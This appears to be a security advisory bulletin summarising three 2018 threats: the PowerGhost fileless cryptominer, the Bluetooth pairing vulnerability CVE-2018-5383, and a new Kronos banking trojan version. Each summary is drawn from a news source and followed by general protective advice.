PowerGhost Malware

45f6ca06-eec3-4ffc-9a71-7659da5cd9f7

 

Dubbed PowerGhost, the fileless malware can secretly embed itself on a single system on a network then spread to other PCs and servers across organisations.

Infections begin with the use of exploits or remote administration tools such as Windows Management Instrumentation. PowerGhost also uses fileless techniques to discreetly go about its business and ensure it isn’t detected on the network.

By adopting this tactic, the PowerGhost miner isn’t stored directly on the hard drive of the infected machine, making it harder to detect.

Source: ZDNet

How do you protect yourself?

Proper security measures must be in place to defend against PowerGhost malware and similar threats. Having proper up-to-date endpoint and firewall security provides a cross-generational blend of threat defense techniques to protect systems from cryptocurrency-mining malware.

 

CVE-2018-5383

Threat Meter

 

Researchers at the Israel Institute of Technology have identified a cryptography-related security vulnerability (CVE-2018-5383) in the Bluetooth specification for over-the-air short-range connectivity between devices, concerning two related Bluetooth features: Secure Simple Pairing and LE Secure Connections.

Simply put, the Bluetooth spec allowed vendors to opt out of implementing public key authentication when devices use the two features, throwing open the door to a man-in-the-middle attack. Without the authentication in place, the vulnerability comes into play: An attacker with physical proximity (within 30 meters) can gain unauthorized access via an adjacent network, intercept traffic and send forged pairing messages between two vulnerable Bluetooth devices. This could result in attackers intercepting information flowing to the devices (including two-factor authentication messages), elevation of privilege and/or denial of service.

Source: ThreatPost

How do you protect yourself?

Users with Bluetooth-capable devices should accordingly install any available updates from device and operating system manufacturers.

Kronos Banking Trojan

Threat Meter

 

A new version of the Kronos banking trojan is making the rounds, according to Proofpoint security researchers, who say they’ve identified at least three campaigns spreading a revamped version of this old trojan that had its heyday back in 2014.

Similarities include that the 2018 version uses the same Windows API hashing technique and hashes, the same string encryption technique, the same C&C encryption mechanism, the same C&C protocol and encryption, the same webinject format (Zeus format), and a similar C&C panel file layout.

But the two versions are not identical. The main difference is that the 2018 edition uses Tor-hosted C&C control panels.

Source: BleepingComputer

How do you protect yourself?

Proper security measures must be in place to defend against Kronos Banking Trojan and similar threats. Having proper up-to-date endpoint security provides a cross-generational blend of threat defense techniques to protect systems from malware.